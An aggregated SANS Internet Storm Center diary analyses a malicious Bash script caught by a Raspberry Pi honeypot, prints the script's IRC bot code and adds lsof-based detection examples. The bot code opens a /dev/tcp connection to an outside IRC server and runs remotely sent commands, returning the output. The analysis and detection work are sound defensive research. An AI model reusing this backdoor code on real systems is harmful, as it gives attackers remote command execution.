GNU/Linux and opensource news gathered

http://linux.feeder.ww7.be

Today, 2 news items:


  • Malicious Network Traffic From /bin/bash, (Wed, Apr 25th), 25 April 2018

    Wednesday 25 April 2018 :: SANS Internet Storm Center, InfoCON : green :: RSS
    One of our readers from Germany sent me a malicious shell script captured by the honeypot[1] running on his Raspberry Pi. It's a simple UNIX Bash script that performs a bunch of malicious tasks:
    • Kills existing crypto miner processes (a classic action these days)
    • Changes the password of the user 'pi' and adds an SSH key
    • Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
    • Creates an IRC bot
    • Installs extra tools like zmap and sshpass
    • Installs itself in /etc/rc.local for persistence

    The script itself is not new: it was already spotted in July 2017, but it appears to have been slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is its ability to run a simple IRC bot using only Bash commands; no high-level language is needed. Bash has had for years a feature that not many people are aware of: you can generate network traffic using standard redirections. By default, a UNIX process always has the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:
    $ echo "Hello world" >/dev/stderr

    In the same way, Bash can use /dev/tcp or /dev/udp to generate network traffic. The syntax is /dev/<proto>/<host>/<port>.
    That's the feature used in the sample. Here is how the bot is created (the code has been beautified):
    eval 'exec 3<>/dev/tcp/$ircserver/6667;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    eval 'printf "NICK $NICK\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    # Main loop
    while [ true ]; do
        eval "read msg_in <&3;"
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        if  [[ "$msg_in" =~ "PING" ]] ; then
            printf "PONG %s\n" "${msg_in:5}";
            eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
            sleep 1
            eval 'printf "JOIN #biret\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
            privmsg_h=$(echo $msg_in| cut -d':' -f 3)
            privmsg_data=$(echo $msg_in| cut -d':' -f 4)
            privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
            hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
            sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
    
            if [[ "$sign" == "$hash" ]] ; then
                CMD=`echo $privmsg_data | base64 -d -i`
                RES=`bash -c "$CMD" | base64 -w 0`
                eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
                if [[ ! "$?" -eq 0 ]] ; then
                    break
                fi
            fi
        fi
    done

    The magic line is the first one, which creates a new file descriptor ('3') used to read from and write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated), and the result of each command is sent back.
    Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use it, you can always recompile Bash with the configure option '--enable-net-redirections'. This can be helpful in many cases. Example: grab data from a remote server without external tools:
    exec 5<> /dev/tcp/blog.rootshell.be/80                              # open a read/write TCP socket on fd 5
    printf "GET / HTTP/1.0\r\nHost: blog.rootshell.be\r\n\r\n" >&5     # HTTP headers end with an empty line
    cat <&5                                                             # read the response until the server closes
    exec 5>&-                                                           # close fd 5
    

    A simple way to detect this behaviour is to search for network flows generated by /bin/bash processes. Example using lsof[3]:
    # lsof -i | grep bash
    bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
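    Here is an added example (not from the diary or its author) that applies the same detection idea to lsof output in a repeatable way: it flags any shell process (bash, sh, dash, zsh, ksh) that owns a TCP or UDP socket, which is exactly what a /dev/tcp or /dev/udp redirection looks like from the outside. It generalizes the grep above to several shells and both protocols. The lsof lines it parses are constructed for the example with documentation-range addresses, and the function and variable names are assumptions of mine, not anything from the sample or from lsof.

```shell
#!/usr/bin/env bash
# Flag shell processes that own network sockets, using `lsof -i -n -P` output.
# A Bash /dev/tcp or /dev/udp redirection shows up here as a socket whose
# COMMAND column is the shell itself, which is rare for legitimate activity.

# Constructed sample of `lsof -i -n -P` output (not captured from a real host);
# addresses come from the documentation ranges.
SAMPLE_LSOF='COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd     1021   root    3u  IPv4  12345      0t0  TCP *:22 (LISTEN)
bash    81084 xavier    5u  IPv4  67890      0t0  TCP 192.0.2.10:57253->198.51.100.7:80 (ESTABLISHED)
bash    81190     pi    3u  IPv4  67891      0t0  TCP 192.0.2.10:41022->203.0.113.5:6667 (ESTABLISHED)
curl    81201 xavier    4u  IPv4  67892      0t0  TCP 192.0.2.10:41100->198.51.100.9:443 (ESTABLISHED)
sh      81300   root    4u  IPv4  67893      0t0  UDP 192.0.2.10:51000->198.51.100.53:53'

# Shells whose sockets we want to see (hypothetical list; extend to local policy).
SHELL_NAMES='^(bash|sh|dash|zsh|ksh)$'

# flag_shell_sockets LSOF_TEXT
# Prints one line per shell-owned socket: PID USER PROTO REMOTE STATE
flag_shell_sockets() {
    printf '%s\n' "$1" | awk -v shells="$SHELL_NAMES" '
        NR == 1 { next }                     # skip the lsof header line
        $1 ~ shells {
            remote = $9                      # NAME column: local->remote
            sub(/.*->/, "", remote)          # keep only the remote endpoint
            state = (NF >= 10) ? $10 : "-"   # UDP lines carry no state
            printf "%s %s %s %s %s\n", $2, $3, $8, remote, state
        }'
}

# count_shell_sockets LSOF_TEXT
# Prints the number of flagged sockets, handy as an alert threshold.
count_shell_sockets() {
    flag_shell_sockets "$1" | wc -l | tr -d ' '
}

# live_check: run the same logic against the local host when lsof is installed.
live_check() {
    command -v lsof >/dev/null 2>&1 || { echo "lsof not installed" >&2; return 2; }
    flag_shell_sockets "$(lsof -i -n -P 2>/dev/null)"
}

# Demonstrate on the constructed sample.
echo "Shell-owned sockets in sample:"
flag_shell_sockets "$SAMPLE_LSOF"
```

    On a real host, call live_check from cron or a collector and treat any output as something to look at: an interactive bash holding an ESTABLISHED connection to port 6667 or 80 is far more suspicious than the same connection owned by curl or a browser. Note that lsof only sees the socket while the redirection is open, so polling catches long-lived bot sessions better than short fetches.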

    [1] https://isc.sans.edu/honeypot.html
    [2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
    [3] https://www.forensicswiki.org/wiki/Lsof
    Xavier Mertens (@xme)
    ISC Handler - Freelance Security Consultant
    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
  • ISC Stormcast For Wednesday, April 25th 2018 https://isc.sans.edu/podcastdetail.html?id=5969, (Wed, Apr 25th), 25 April 2018

    Wednesday 25 April 2018 :: SANS Internet Storm Center, InfoCON : green :: RSS